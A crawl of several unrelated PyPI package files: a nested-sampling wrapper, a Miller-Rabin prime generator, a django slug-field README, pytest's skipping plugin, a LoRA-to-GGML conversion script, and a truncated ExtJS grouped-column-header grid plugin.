self.result.nested_samples['log_likelihood'] = out.logl
idxs = [np.unique(np.where(self.result.samples[ii] == out.samples)[0])
for ii in range(len(out.logl))]
self.result.log_likelihood_evaluations = out.logl[idxs]
self.result.log_evidence = out.logz
self.result.log_evidence_err = out.logzerr
return self.result
def _run_test(self):
"""
Runs to test whether the sampler is properly running with the given
kwargs without actually running to the end
Returns
-------
tupak.core.result.Result: Dummy container for sampling results.
"""
import nestle
kwargs = self.kwargs.copy()
kwargs['maxiter'] = 2
nestle.sample(
loglikelihood=self.log_likelihood,
prior_transform=self.prior_transform,
ndim=self.ndim, **kwargs)
self.result.samples = np.random.uniform(0, 1, (100, self.ndim))
self.result.log_evidence = np.nan
self.result.log_evidence_err = np.nan
return self.result | PypiClean |
/CeroCoinClient-2.0.1.tar.gz/CeroCoinClient-2.0.1/PrimeGenerator/PrimeGenerator.py | __version__ = '1.9.0'
__author__ = "Avinash Kak (kak@purdue.edu)"
__date__ = '2018-March-18'
__url__ = 'https://engineering.purdue.edu/kak/distCeroCoin/CeroCoinClient-1-9.0.html'
__copyright__ = "(C) 2018 Avinash Kak. Python Software Foundation."
__doc__ = '''
Call syntax:
PrimeGenerator.py width_desired_for_bit_field_for_prime
For example, if you call
PrimeGenerator.py 32
you may get a prime that looks like 3262037833. On the other hand, if you
call
PrimeGenerator.py 128
you may get a prime that looks like 338816507393364952656338247029475569761
IMPORTANT: The two most significant bits are explicitly set for the prime that is
returned.
'''
#from CeroCoinClient import CeroCoinClient
import sys
import random
############################ class PrimeGenerator ##############################
class PrimeGenerator( object ): #(A1)
def __init__( self, **kwargs ): #(A2)
bits = debug = None #(A3)
if 'bits' in kwargs : bits = kwargs.pop('bits') #(A4)
if 'debug' in kwargs : debug = kwargs.pop('debug') #(A5)
self.bits = bits #(A6)
self.debug = debug #(A7)
self._largest = (1 << bits) - 1 #(A8)
def set_initial_candidate(self): #(B1)
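        # Draw a random odd integer of the requested width and force its two most
        # significant bits to 1, so the returned prime has exactly 'bits' bits and
        # the product of two such primes keeps the full 2*bits width.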
candidate = random.getrandbits( self.bits ) #(B2)
if candidate & 1 == 0: candidate += 1 #(B3)
candidate |= (1 << self.bits-1) #(B4)
candidate |= (2 << self.bits-3) #(B5)
self.candidate = candidate #(B6)
def set_probes(self): #(C1)
self.probes = [2,3,5,7,11,13,17] #(C2)
# This is the same primality testing function as shown earlier
# in Section 11.5.6 of Lecture 11:
def test_candidate_for_prime(self): #(D1)
        'return the estimated probability that the candidate is prime, or 0 if it is found to be composite'
p = self.candidate #(D2)
if p == 1: return 0 #(D3)
if p in self.probes: #(D4)
self.probability_of_prime = 1 #(D5)
return 1 #(D6)
if any([p % a == 0 for a in self.probes]): return 0 #(D7)
k, q = 0, self.candidate-1 #(D8)
while not q&1: #(D9)
q >>= 1 #(D10)
k += 1 #(D11)
if self.debug: print("q = %d k = %d" % (q,k)) #(D12)
for a in self.probes: #(D13)
a_raised_to_q = pow(a, q, p) #(D14)
if a_raised_to_q == 1 or a_raised_to_q == p-1: continue #(D15)
a_raised_to_jq = a_raised_to_q #(D16)
primeflag = 0 #(D17)
for j in range(k-1): #(D18)
a_raised_to_jq = pow(a_raised_to_jq, 2, p) #(D19)
if a_raised_to_jq == p-1: #(D20)
primeflag = 1 #(D21)
break #(D22)
if not primeflag: return 0 #(D23)
self.probability_of_prime = 1 - 1.0/(4 ** len(self.probes)) #(D24)
return self.probability_of_prime #(D25)
def findPrime(self): #(E1)
self.set_initial_candidate() #(E2)
if self.debug: print(" candidate is: %d" % self.candidate) #(E3)
self.set_probes() #(E4)
if self.debug: print(" The probes are: %s" % str(self.probes)) #(E5)
max_reached = 0 #(E6)
while 1: #(E7)
if self.test_candidate_for_prime(): #(E8)
if self.debug: #(E9)
print("Prime number: %d with probability %f\n" %
(self.candidate, self.probability_of_prime) ) #(E10)
break #(E11)
else: #(E12)
if max_reached: #(E13)
self.candidate -= 2 #(E14)
elif self.candidate >= self._largest - 2: #(E15)
max_reached = 1 #(E16)
self.candidate -= 2 #(E17)
else: #(E18)
self.candidate += 2 #(E19)
if self.debug: #(E20)
print(" candidate is: %d" % self.candidate) #(E21)
return self.candidate #(E22)
#################################### main ######################################
if __name__ == '__main__':
if len( sys.argv ) != 2: #(M1)
sys.exit( "Call syntax: PrimeGenerator.py width_of_bit_field" ) #(M2)
num_of_bits_desired = int(sys.argv[1]) #(M3)
generator = PrimeGenerator( bits = num_of_bits_desired ) #(M4)
prime = generator.findPrime() #(M5)
print("Prime returned: %d" % prime) #(M6) | PypiClean |
/django-centralniak-slugfield-0.1.5.tar.gz/django-centralniak-slugfield-0.1.5/README.rst | django-centralniak-slugfield
============================
This tiny project adds a new Django field type ``CentralniakSlugField`` that automatically creates and/or updates
a slug on save. The slug method supports far more regional characters than the core Django one (yes, the cyrillic
alphabet is supported).
The project was somewhat inspired by `Doctrine ORM's approach <http://www.doctrine-project.org/documentation/manual/1_0/en/behaviors:core-behaviors:sluggable>`_ to slugs.
Features:
---------
1. You can choose which fields to populate a slug from (single or multifield slug)
2. You can choose whether the slug should be updated on every record update or only on creation
3. Slugs can be made unique per a given expression only (for example a given date)
Installation:
-------------
* Put ``django_centralniak_slugfield`` in your ``INSTALLED_APPS``
Usage:
------
::
    from django.db import models
    from django_centralniak_slugfield import CentralniakSlugField
    class MyModel(models.Model):
fieldname1 = models.CharField(max_length=12)
fieldname2 = models.CharField(max_length=34)
other_model = models.ForeignKey(OtherModel)
slug = CentralniakSlugField(populate_from=['fieldname1', 'fieldname2'], update_on_edit=False, unique_for=['other_model'])
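The slug is then filled in automatically when the instance is saved. A rough sketch of the expected behaviour (the exact slugified output and separator are assumptions, not taken from this project's docs)::
    obj = MyModel(fieldname1=u"Zażółć", fieldname2=u"gęślą", other_model=other)
    obj.save()
    obj.slug  # populated from fieldname1 and fieldname2, e.g. something like u"zazolc-gesla"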
Kudos:
------
Samuel Adam for the slughifi module (couldn't find it online anymore) | PypiClean |
/django-templateselector-0.2.0.tar.gz/django-templateselector-0.2.0/.eggs/pytest-3.2.1-py2.7.egg/_pytest/skipping.py | from __future__ import absolute_import, division, print_function
import os
import sys
import traceback
import py
from _pytest.config import hookimpl
from _pytest.mark import MarkInfo, MarkDecorator
from _pytest.outcomes import fail, skip, xfail, TEST_OUTCOME
def pytest_addoption(parser):
group = parser.getgroup("general")
group.addoption('--runxfail',
action="store_true", dest="runxfail", default=False,
help="run tests even if they are marked xfail")
parser.addini("xfail_strict", "default for the strict parameter of xfail "
"markers when not given explicitly (default: "
"False)",
default=False,
type="bool")
def pytest_configure(config):
if config.option.runxfail:
# yay a hack
import pytest
old = pytest.xfail
config._cleanup.append(lambda: setattr(pytest, "xfail", old))
def nop(*args, **kwargs):
pass
nop.Exception = xfail.Exception
setattr(pytest, "xfail", nop)
config.addinivalue_line("markers",
"skip(reason=None): skip the given test function with an optional reason. "
"Example: skip(reason=\"no way of currently testing this\") skips the "
"test."
)
config.addinivalue_line("markers",
"skipif(condition): skip the given test function if eval(condition) "
"results in a True value. Evaluation happens within the "
"module global context. Example: skipif('sys.platform == \"win32\"') "
"skips the test if we are on the win32 platform. see "
"http://pytest.org/latest/skipping.html"
)
config.addinivalue_line("markers",
"xfail(condition, reason=None, run=True, raises=None, strict=False): "
"mark the test function as an expected failure if eval(condition) "
"has a True value. Optionally specify a reason for better reporting "
"and run=False if you don't even want to execute the test function. "
"If only specific exception(s) are expected, you can list them in "
"raises, and if the test fails in other ways, it will be reported as "
"a true failure. See http://pytest.org/latest/skipping.html"
)
class MarkEvaluator:
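    """Lazily evaluate the condition arguments of a ``skipif``/``xfail`` mark attached to a test item."""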
def __init__(self, item, name):
self.item = item
self.name = name
@property
def holder(self):
return self.item.keywords.get(self.name)
def __bool__(self):
return bool(self.holder)
__nonzero__ = __bool__
def wasvalid(self):
return not hasattr(self, 'exc')
def invalidraise(self, exc):
raises = self.get('raises')
if not raises:
return
return not isinstance(exc, raises)
def istrue(self):
try:
return self._istrue()
except TEST_OUTCOME:
self.exc = sys.exc_info()
if isinstance(self.exc[1], SyntaxError):
msg = [" " * (self.exc[1].offset + 4) + "^", ]
msg.append("SyntaxError: invalid syntax")
else:
msg = traceback.format_exception_only(*self.exc[:2])
fail("Error evaluating %r expression\n"
" %s\n"
"%s"
% (self.name, self.expr, "\n".join(msg)),
pytrace=False)
def _getglobals(self):
d = {'os': os, 'sys': sys, 'config': self.item.config}
if hasattr(self.item, 'obj'):
d.update(self.item.obj.__globals__)
return d
def _istrue(self):
if hasattr(self, 'result'):
return self.result
if self.holder:
if self.holder.args or 'condition' in self.holder.kwargs:
self.result = False
# "holder" might be a MarkInfo or a MarkDecorator; only
# MarkInfo keeps track of all parameters it received in an
# _arglist attribute
marks = getattr(self.holder, '_marks', None) \
or [self.holder.mark]
for _, args, kwargs in marks:
if 'condition' in kwargs:
args = (kwargs['condition'],)
for expr in args:
self.expr = expr
if isinstance(expr, py.builtin._basestring):
d = self._getglobals()
result = cached_eval(self.item.config, expr, d)
else:
if "reason" not in kwargs:
# XXX better be checked at collection time
msg = "you need to specify reason=STRING " \
"when using booleans as conditions."
fail(msg)
result = bool(expr)
if result:
self.result = True
self.reason = kwargs.get('reason', None)
self.expr = expr
return self.result
else:
self.result = True
return getattr(self, 'result', False)
def get(self, attr, default=None):
return self.holder.kwargs.get(attr, default)
def getexplanation(self):
expl = getattr(self, 'reason', None) or self.get('reason', None)
if not expl:
if not hasattr(self, 'expr'):
return ""
else:
return "condition: " + str(self.expr)
return expl
@hookimpl(tryfirst=True)
def pytest_runtest_setup(item):
# Check if skip or skipif are specified as pytest marks
skipif_info = item.keywords.get('skipif')
if isinstance(skipif_info, (MarkInfo, MarkDecorator)):
eval_skipif = MarkEvaluator(item, 'skipif')
if eval_skipif.istrue():
item._evalskip = eval_skipif
skip(eval_skipif.getexplanation())
skip_info = item.keywords.get('skip')
if isinstance(skip_info, (MarkInfo, MarkDecorator)):
item._evalskip = True
if 'reason' in skip_info.kwargs:
skip(skip_info.kwargs['reason'])
elif skip_info.args:
skip(skip_info.args[0])
else:
skip("unconditional skip")
item._evalxfail = MarkEvaluator(item, 'xfail')
check_xfail_no_run(item)
@hookimpl(hookwrapper=True)
def pytest_pyfunc_call(pyfuncitem):
check_xfail_no_run(pyfuncitem)
outcome = yield
passed = outcome.excinfo is None
if passed:
check_strict_xfail(pyfuncitem)
def check_xfail_no_run(item):
"""check xfail(run=False)"""
if not item.config.option.runxfail:
evalxfail = item._evalxfail
if evalxfail.istrue():
if not evalxfail.get('run', True):
xfail("[NOTRUN] " + evalxfail.getexplanation())
def check_strict_xfail(pyfuncitem):
"""check xfail(strict=True) for the given PASSING test"""
evalxfail = pyfuncitem._evalxfail
if evalxfail.istrue():
strict_default = pyfuncitem.config.getini('xfail_strict')
is_strict_xfail = evalxfail.get('strict', strict_default)
if is_strict_xfail:
del pyfuncitem._evalxfail
explanation = evalxfail.getexplanation()
fail('[XPASS(strict)] ' + explanation, pytrace=False)
@hookimpl(hookwrapper=True)
def pytest_runtest_makereport(item, call):
outcome = yield
rep = outcome.get_result()
evalxfail = getattr(item, '_evalxfail', None)
evalskip = getattr(item, '_evalskip', None)
    # unittest special case, see setting of _unexpectedsuccess
if hasattr(item, '_unexpectedsuccess') and rep.when == "call":
from _pytest.compat import _is_unittest_unexpected_success_a_failure
if item._unexpectedsuccess:
rep.longrepr = "Unexpected success: {0}".format(item._unexpectedsuccess)
else:
rep.longrepr = "Unexpected success"
if _is_unittest_unexpected_success_a_failure():
rep.outcome = "failed"
else:
rep.outcome = "passed"
rep.wasxfail = rep.longrepr
elif item.config.option.runxfail:
        pass  # don't interfere
elif call.excinfo and call.excinfo.errisinstance(xfail.Exception):
rep.wasxfail = "reason: " + call.excinfo.value.msg
rep.outcome = "skipped"
elif evalxfail and not rep.skipped and evalxfail.wasvalid() and \
evalxfail.istrue():
if call.excinfo:
if evalxfail.invalidraise(call.excinfo.value):
rep.outcome = "failed"
else:
rep.outcome = "skipped"
rep.wasxfail = evalxfail.getexplanation()
elif call.when == "call":
strict_default = item.config.getini('xfail_strict')
is_strict_xfail = evalxfail.get('strict', strict_default)
explanation = evalxfail.getexplanation()
if is_strict_xfail:
rep.outcome = "failed"
rep.longrepr = "[XPASS(strict)] {0}".format(explanation)
else:
rep.outcome = "passed"
rep.wasxfail = explanation
elif evalskip is not None and rep.skipped and type(rep.longrepr) is tuple:
# skipped by mark.skipif; change the location of the failure
# to point to the item definition, otherwise it will display
# the location of where the skip exception was raised within pytest
filename, line, reason = rep.longrepr
filename, line = item.location[:2]
rep.longrepr = filename, line, reason
# called by terminalreporter progress reporting
def pytest_report_teststatus(report):
if hasattr(report, "wasxfail"):
if report.skipped:
return "xfailed", "x", "xfail"
elif report.passed:
return "xpassed", "X", ("XPASS", {'yellow': True})
# called by the terminalreporter instance/plugin
def pytest_terminal_summary(terminalreporter):
tr = terminalreporter
if not tr.reportchars:
# for name in "xfailed skipped failed xpassed":
# if not tr.stats.get(name, 0):
# tr.write_line("HINT: use '-r' option to see extra "
# "summary info about tests")
# break
return
lines = []
for char in tr.reportchars:
if char == "x":
show_xfailed(terminalreporter, lines)
elif char == "X":
show_xpassed(terminalreporter, lines)
elif char in "fF":
show_simple(terminalreporter, lines, 'failed', "FAIL %s")
elif char in "sS":
show_skipped(terminalreporter, lines)
elif char == "E":
show_simple(terminalreporter, lines, 'error', "ERROR %s")
elif char == 'p':
show_simple(terminalreporter, lines, 'passed', "PASSED %s")
if lines:
tr._tw.sep("=", "short test summary info")
for line in lines:
tr._tw.line(line)
def show_simple(terminalreporter, lines, stat, format):
failed = terminalreporter.stats.get(stat)
if failed:
for rep in failed:
pos = terminalreporter.config.cwd_relative_nodeid(rep.nodeid)
lines.append(format % (pos,))
def show_xfailed(terminalreporter, lines):
xfailed = terminalreporter.stats.get("xfailed")
if xfailed:
for rep in xfailed:
pos = terminalreporter.config.cwd_relative_nodeid(rep.nodeid)
reason = rep.wasxfail
lines.append("XFAIL %s" % (pos,))
if reason:
lines.append(" " + str(reason))
def show_xpassed(terminalreporter, lines):
xpassed = terminalreporter.stats.get("xpassed")
if xpassed:
for rep in xpassed:
pos = terminalreporter.config.cwd_relative_nodeid(rep.nodeid)
reason = rep.wasxfail
lines.append("XPASS %s %s" % (pos, reason))
def cached_eval(config, expr, d):
if not hasattr(config, '_evalcache'):
config._evalcache = {}
try:
return config._evalcache[expr]
except KeyError:
import _pytest._code
exprcode = _pytest._code.compile(expr, mode="eval")
config._evalcache[expr] = x = eval(exprcode, d)
return x
def folded_skips(skipped):
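    # Group skip reports that share the same (fspath, lineno, reason) triple and return
    # a list of (count, fspath, lineno, reason) tuples for the terminal summary.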
d = {}
for event in skipped:
key = event.longrepr
assert len(key) == 3, (event, key)
d.setdefault(key, []).append(event)
l = []
for key, events in d.items():
l.append((len(events),) + key)
return l
def show_skipped(terminalreporter, lines):
tr = terminalreporter
skipped = tr.stats.get('skipped', [])
if skipped:
# if not tr.hasopt('skipped'):
# tr.write_line(
# "%d skipped tests, specify -rs for more info" %
# len(skipped))
# return
fskips = folded_skips(skipped)
if fskips:
# tr.write_sep("_", "skipped test summary")
for num, fspath, lineno, reason in fskips:
if reason.startswith("Skipped: "):
reason = reason[9:]
lines.append(
"SKIP [%d] %s:%d: %s" %
(num, fspath, lineno + 1, reason)) | PypiClean |
/fastllama_python_test-0.1.tar.gz/fastllama_python_test-0.1/scripts/convert-lora-to-ggml.py | from io import BufferedWriter
import json
import os
import re
import struct
import sys
from typing import Any, Mapping, MutableMapping, Sequence, Tuple
import argparse
import torch
from convert import DATA_TYPE_TO_FTYPE, NUMPY_TYPE_TO_DATA_TYPE, DataType
HF_SUBLAYER_TO_GGML: Mapping[str, str] = {
"self_attn.q_proj": "attention.wq",
"self_attn.k_proj": "attention.wk",
"self_attn.v_proj": "attention.wv",
"self_attn.o_proj": "attention.wo",
"mlp.gate_proj": "feed_forward.w1",
"mlp.down_proj": "feed_forward.w2",
"mlp.up_proj": "feed_forward.w3",
"input_layernorm": "attention_norm",
"post_attention_layernorm": "ffn_norm",
# "norm": "norm",
# "embed_tokens": "tok_embeddings",
# "lm_head": "output",
}
def translate_tensor_name(t: str) -> Tuple[str, str]:
match = re.match(r".*layers\.(\d+)\.(\w+\.\w+)\.lora_(A|B)\.weight", t)
if match:
nn = match.group(1)
sub_layer = match.group(2)
lora_type = match.group(3)
sub_layer_renamed = HF_SUBLAYER_TO_GGML.get(sub_layer)
if sub_layer_renamed is None:
print(f"Error: unrecognized sub-layer {sub_layer} in tensor {t}")
sys.exit(1)
output_string = (
f"layers.{nn}.{HF_SUBLAYER_TO_GGML[sub_layer]}.weight.lora"
)
return (output_string, lora_type)
else:
print(f"Error: unrecognized tensor {t}")
sys.exit(1)
def write_file_header(fout: BufferedWriter, _params: Mapping[str, Any]) -> None:
fout.write(b"ggla"[::-1]) # magic (ggml lora)
fout.write(struct.pack("i", 1)) # file version
# fout.write(struct.pack("ii", params["r"], params["lora_alpha"]))
def write_tensor_header(
fout: BufferedWriter, name: str, shape: Sequence[int], data_type: DataType
) -> None:
sname = bytes(name, 'utf-8')
fout.write(
struct.pack(
"iii",
len(shape),
len(sname),
DATA_TYPE_TO_FTYPE[NUMPY_TYPE_TO_DATA_TYPE[data_type]],
)
)
fout.write(struct.pack("i" * len(shape), *shape[::-1]))
fout.write(sname)
fout.seek((fout.tell() + 31) & -32)
def parse_args() -> argparse.Namespace:
parser = argparse.ArgumentParser()
parser.add_argument(
"path",
type=str,
help="Path must contain HuggingFace PEFT LoRA files 'adapter_config.json' and 'adapter_model.bin'",
)
parser.add_argument(
'-t',
'--dtype',
choices=['fp16', 'fp32'],
default='fp32',
help='Data type to use for the converted model. Default: %(default)s',
dest='dtype',
)
return parser.parse_args(sys.argv[1:])
def read_params(input_json: str) -> Mapping[str, Any]:
params: MutableMapping[str, Any] = {}
with open(input_json, "r") as f:
params = json.load(f)
if params["peft_type"] != "LORA":
print(f"Error: unsupported adapter type {params['peft_type']}, expected LORA")
sys.exit(1)
if params["fan_in_fan_out"] == True:
print("Error: param fan_in_fan_out is not supported")
sys.exit(1)
if params["bias"] is not None and params["bias"] != "none":
print("Error: param bias is not supported")
sys.exit(1)
# TODO: these seem to be layers that have been trained but without lora.
# doesn't seem widely used but eventually should be supported
if params["modules_to_save"] is not None and len(params["modules_to_save"]) > 0:
print("Error: param modules_to_save is not supported")
sys.exit(1)
return params
def normalize_tensors(model: Any, params: Mapping[str, Any]) -> Mapping[str, Tuple[torch.Tensor, str]]:
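    # Fold each LoRA A/B pair into a single merged delta tensor: delta = (B @ A) * (lora_alpha / r).
    # Only these merged tensors (stored with an empty type marker) are written to the GGML file later.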
r = float(params["r"])
lora_alpha = float(params["lora_alpha"])
scale = lora_alpha / r
tensor_map: MutableMapping[str, Tuple[torch.Tensor, str]] = {}
for k, v in model.items():
if k.endswith("lora_A.weight"):
if v.dtype != torch.float16 and v.dtype != torch.float32:
v = v.float()
else:
v = v.float()
(tensor_name, type) = translate_tensor_name(k)
if tensor_name in tensor_map:
(old_tensor, old_type) = tensor_map[tensor_name]
new_tensor = torch.matmul(v, old_tensor) if old_type == 'A' else torch.matmul(old_tensor, v)
new_tensor = new_tensor * scale
tensor_map[tensor_name] = (new_tensor, "")
else:
tensor_map[tensor_name] = (v, type)
return tensor_map
def main() -> None:
args = parse_args()
input_json = os.path.join(args.path, "adapter_config.json")
input_model = os.path.join(args.path, "adapter_model.bin")
    output_path = os.path.join(args.path, "ggml-adapter-model.bin")
params = read_params(input_json)
model = torch.load(input_model, map_location="cpu")
print("Normalizing tensors...")
tensor_map = normalize_tensors(model, params)
print("Normalization completed.\nWriting output...")
with open(output_path, "wb") as fout:
fout.truncate()
write_file_header(fout, params)
for tname, (v, ltype) in tensor_map.items():
if ltype != "":
continue
if args.dtype == 'fp16':
t = v.half().numpy()
else:
t = v.numpy()
print(f"{tname} {t.shape} {t.dtype} {t.nbytes/1024/1024:.2f}MB")
write_tensor_header(fout, tname, t.shape, t.dtype)
t.tofile(fout)
print(f"Converted {input_json} and {input_model} to {output_path}")
if __name__ == '__main__':
main() | PypiClean |
/collective.js.extjs-1.4.0.tar.gz/collective.js.extjs-1.4.0/collective/js/extjs/resources/ux/ColumnHeaderGroup.js | Ext.ns('Ext.ux.grid');
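// Grid plugin that renders extra, grouped header rows (taken from the "rows" entry of the
// ColumnModel config) above the regular column headers, keeping the group cells' widths and
// visibility in sync with the underlying columns.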
Ext.ux.grid.ColumnHeaderGroup = Ext.extend(Ext.util.Observable, {
constructor: function(config){
this.config = config;
},
init: function(grid){
Ext.applyIf(grid.colModel, this.config);
Ext.apply(grid.getView(), this.viewConfig);
},
viewConfig: {
initTemplates: function(){
this.constructor.prototype.initTemplates.apply(this, arguments);
var ts = this.templates || {};
if(!ts.gcell){
ts.gcell = new Ext.XTemplate('<td class="x-grid3-hd x-grid3-gcell x-grid3-td-{id} ux-grid-hd-group-row-{row} {cls}" style="{style}">', '<div {tooltip} class="x-grid3-hd-inner x-grid3-hd-{id}" unselectable="on" style="{istyle}">', this.grid.enableHdMenu ? '<a class="x-grid3-hd-btn" href="#"></a>' : '', '{value}</div></td>');
}
this.templates = ts;
this.hrowRe = new RegExp("ux-grid-hd-group-row-(\\d+)", "");
},
renderHeaders: function(){
var ts = this.templates, headers = [], cm = this.cm, rows = cm.rows, tstyle = 'width:' + this.getTotalWidth() + ';';
for(var row = 0, rlen = rows.length; row < rlen; row++){
var r = rows[row], cells = [];
for(var i = 0, gcol = 0, len = r.length; i < len; i++){
var group = r[i];
group.colspan = group.colspan || 1;
var id = this.getColumnId(group.dataIndex ? cm.findColumnIndex(group.dataIndex) : gcol), gs = Ext.ux.grid.ColumnHeaderGroup.prototype.getGroupStyle.call(this, group, gcol);
cells[i] = ts.gcell.apply({
cls: 'ux-grid-hd-group-cell',
id: id,
row: row,
style: 'width:' + gs.width + ';' + (gs.hidden ? 'display:none;' : '') + (group.align ? 'text-align:' + group.align + ';' : ''),
tooltip: group.tooltip ? (Ext.QuickTips.isEnabled() ? 'ext:qtip' : 'title') + '="' + group.tooltip + '"' : '',
istyle: group.align == 'right' ? 'padding-right:16px' : '',
btn: this.grid.enableHdMenu && group.header,
value: group.header || ' '
});
gcol += group.colspan;
}
headers[row] = ts.header.apply({
tstyle: tstyle,
cells: cells.join('')
});
}
headers.push(this.constructor.prototype.renderHeaders.apply(this, arguments));
return headers.join('');
},
onColumnWidthUpdated: function(){
this.constructor.prototype.onColumnWidthUpdated.apply(this, arguments);
Ext.ux.grid.ColumnHeaderGroup.prototype.updateGroupStyles.call(this);
},
onAllColumnWidthsUpdated: function(){
this.constructor.prototype.onAllColumnWidthsUpdated.apply(this, arguments);
Ext.ux.grid.ColumnHeaderGroup.prototype.updateGroupStyles.call(this);
},
onColumnHiddenUpdated: function(){
this.constructor.prototype.onColumnHiddenUpdated.apply(this, arguments);
Ext.ux.grid.ColumnHeaderGroup.prototype.updateGroupStyles.call(this);
},
getHeaderCell: function(index){
return this.mainHd.query(this.cellSelector)[index];
},
findHeaderCell: function(el){
return el ? this.fly(el).findParent('td.x-grid3-hd', this.cellSelectorDepth) : false;
},
findHeaderIndex: function(el){
var cell = this.findHeaderCell(el);
return cell ? this.getCellIndex(cell) : false;
},
updateSortIcon: function(col, dir){
var sc = this.sortClasses, hds = this.mainHd.select(this.cellSelector).removeClass(sc);
hds.item(col).addClass(sc[dir == "DESC" ? 1 : 0]);
},
handleHdDown: function(e, t){
var el = Ext.get(t);
if(el.hasClass('x-grid3-hd-btn')){
e.stopEvent();
var hd = this.findHeaderCell(t);
Ext.fly(hd).addClass('x-grid3-hd-menu-open');
var index = this.getCellIndex(hd);
this.hdCtxIndex = index;
var ms = this.hmenu.items, cm = this.cm;
ms.get('asc').setDisabled(!cm.isSortable(index));
ms.get('desc').setDisabled(!cm.isSortable(index));
this.hmenu.on('hide', function(){
Ext.fly(hd).removeClass('x-grid3-hd-menu-open');
}, this, {
single: true
});
this.hmenu.show(t, 'tl-bl?');
}else if(el.hasClass('ux-grid-hd-group-cell') || Ext.fly(t).up('.ux-grid-hd-group-cell')){
e.stopEvent();
}
},
handleHdMove: function(e, t){
var hd = this.findHeaderCell(this.activeHdRef);
if(hd && !this.headersDisabled && !Ext.fly(hd).hasClass('ux-grid-hd-group-cell')){
var hw = this.splitHandleWidth || 5, r = this.activeHdRegion, x = e.getPageX(), ss = hd.style, cur = '';
if(this.grid.enableColumnResize !== false){
if(x - r.left <= hw && this.cm.isResizable(this.activeHdIndex - 1)){
                    cur = Ext.isAir ? 'move' : Ext.isWebKit ? 'e-resize' : 'col-resize'; // col-resize not always supported
}else if(r.right - x <= (!this.activeHdBtn ? hw : 2) && this.cm.isResizable(this.activeHdIndex)){
cur = Ext.isAir ? 'move' : Ext.isWebKit ? 'w-resize' : 'col-resize';
}
}
ss.cursor = cur;
}
},
handleHdOver: function(e, t){
var hd = this.findHeaderCell(t);
if(hd && !this.headersDisabled){
this.activeHdRef = t;
this.activeHdIndex = this.getCellIndex(hd);
var fly = this.fly(hd);
this.activeHdRegion = fly.getRegion();
if(!(this.cm.isMenuDisabled(this.activeHdIndex) || fly.hasClass('ux-grid-hd-group-cell'))){
fly.addClass('x-grid3-hd-over');
this.activeHdBtn = fly.child('.x-grid3-hd-btn');
if(this.activeHdBtn){
this.activeHdBtn.dom.style.height = (hd.firstChild.offsetHeight - 1) + 'px';
}
}
}
},
handleHdOut: function(e, t){
var hd = this.findHeaderCell(t);
if(hd && (!Ext.isIE || !e.within(hd, true))){
this.activeHdRef = null;
this.fly(hd).removeClass('x-grid3-hd-over');
hd.style.cursor = '';
}
},
handleHdMenuClick: function(item){
var index = this.hdCtxIndex, cm = this.cm, ds = this.ds, id = item.getItemId();
switch(id){
case 'asc':
ds.sort(cm.getDataIndex(index), 'ASC');
break;
case 'desc':
ds.sort(cm.getDataIndex(index), 'DESC');
break;
default:
if(id.substr(0, 6) == 'group-'){
var i = id.split('-'), row = parseInt(i[1], 10), col = parseInt(i[2], 10), r = this.cm.rows[row], group, gcol = 0;
for(var i = 0, len = r.length; i < len; i++){
group = r[i];
if(col >= gcol && col < gcol + group.colspan){
break;
}
gcol += group.colspan;
}
if(item.checked){
var max = cm.getColumnsBy(this.isHideableColumn, this).length;
for(var i = gcol, len = gcol + group.colspan; i < len; i++){
if(!cm.isHidden(i)){
max--;
}
}
if(max < 1){
this.onDenyColumnHide();
return false;
}
}
for(var i = gcol, len = gcol + group.colspan; i < len; i++){
if(cm.config[i].fixed !== true && cm.config[i].hideable !== false){
cm.setHidden(i, item.checked);
}
}
}else if(id.substr(0, 4) == 'col-'){
index = cm.getIndexById(id.substr(4));
if(index != -1){
if(item.checked && cm.getColumnsBy(this.isHideableColumn, this).length <= 1){
this.onDenyColumnHide();
return false;
}
cm.setHidden(index, item.checked);
}
}
if(id.substr(0, 6) == 'group-' || id.substr(0, 4) == 'col-'){
item.checked = !item.checked;
if(item.menu){
var updateChildren = function(menu){
menu.items.each(function(childItem){
if(!childItem.disabled){
childItem.setChecked(item.checked, false);
if(childItem.menu){
updateChildren(childItem.menu);
}
}
});
}
updateChildren(item.menu);
}
var parentMenu = item, parentItem;
while(parentMenu = parentMenu.parentMenu){
if(!parentMenu.parentMenu || !(parentItem = parentMenu.parentMenu.items.get(parentMenu.getItemId())) || !parentItem.setChecked){
break;
}
var checked = parentMenu.items.findIndexBy(function(m){
return m.checked;
}) >= 0;
parentItem.setChecked(checked, true);
}
item.checked = !item.checked;
}
}
return true;
},
beforeColMenuShow: function(){
var cm = this.cm, rows = this.cm.rows;
this.colMenu.removeAll();
for(var col = 0, clen = cm.getColumnCount(); col < clen; col++){
var menu = this.colMenu, title = cm.getColumnHeader(col), text = [];
if(cm.config[col].fixed !== true && cm.config[col].hideable !== false){
for(var row = 0, rlen = rows.length; row < rlen; row++){
var r = rows[row], group, gcol = 0;
for(var i = 0, len = r.length; i < len; i++){
group = r[i];
if(col >= gcol && col < gcol + group.colspan){
break;
}
gcol += group.colspan;
}
if(group && group.header){
if(cm.hierarchicalColMenu){
var gid = 'group-' + row + '-' + gcol,
item = menu.items ? menu.getComponent(gid) : null,
submenu = item ? item.menu : null;
if(!submenu){
submenu = new Ext.menu.Menu({
itemId: gid
});
submenu.on("itemclick", this.handleHdMenuClick, this);
var checked = false, disabled = true;
for(var c = gcol, lc = gcol + group.colspan; c < lc; c++){
if(!cm.isHidden(c)){
checked = true;
}
if(cm.config[c].hideable !== false){
disabled = false;
}
}
menu.add({
itemId: gid,
text: group.header,
menu: submenu,
hideOnClick: false,
checked: checked,
disabled: disabled
});
}
menu = submenu;
}else{
text.push(group.header);
}
}
}
text.push(title);
menu.add(new Ext.menu.CheckItem({
itemId: "col-" + cm.getColumnId(col),
text: text.join(' '),
checked: !cm.isHidden(col),
hideOnClick: false,
disabled: cm.config[col].hideable === false
}));
}
}
},
afterRenderUI: function(){
this.constructor.prototype.afterRenderUI.apply(this, arguments);
Ext.apply(this.columnDrop, Ext.ux.grid.ColumnHeaderGroup.prototype.columnDropConfig);
Ext.apply(this.splitZone, Ext.ux.grid.ColumnHeaderGroup.prototype.splitZoneConfig);
}
},
splitZoneConfig: {
allowHeaderDrag: function(e){
return !e.getTarget(null, null, true).hasClass('ux-grid-hd-group-cell');
}
},
columnDropConfig: {
getTargetFromEvent: function(e){
var t = Ext.lib.Event.getTarget(e);
return this.view.findHeaderCell(t);
},
positionIndicator: function(h, n, e){
var data = Ext.ux.grid.ColumnHeaderGroup.prototype.getDragDropData.call(this, h, n, e);
if(data === false){
return false;
}
var px = data.px + this.proxyOffsets[0];
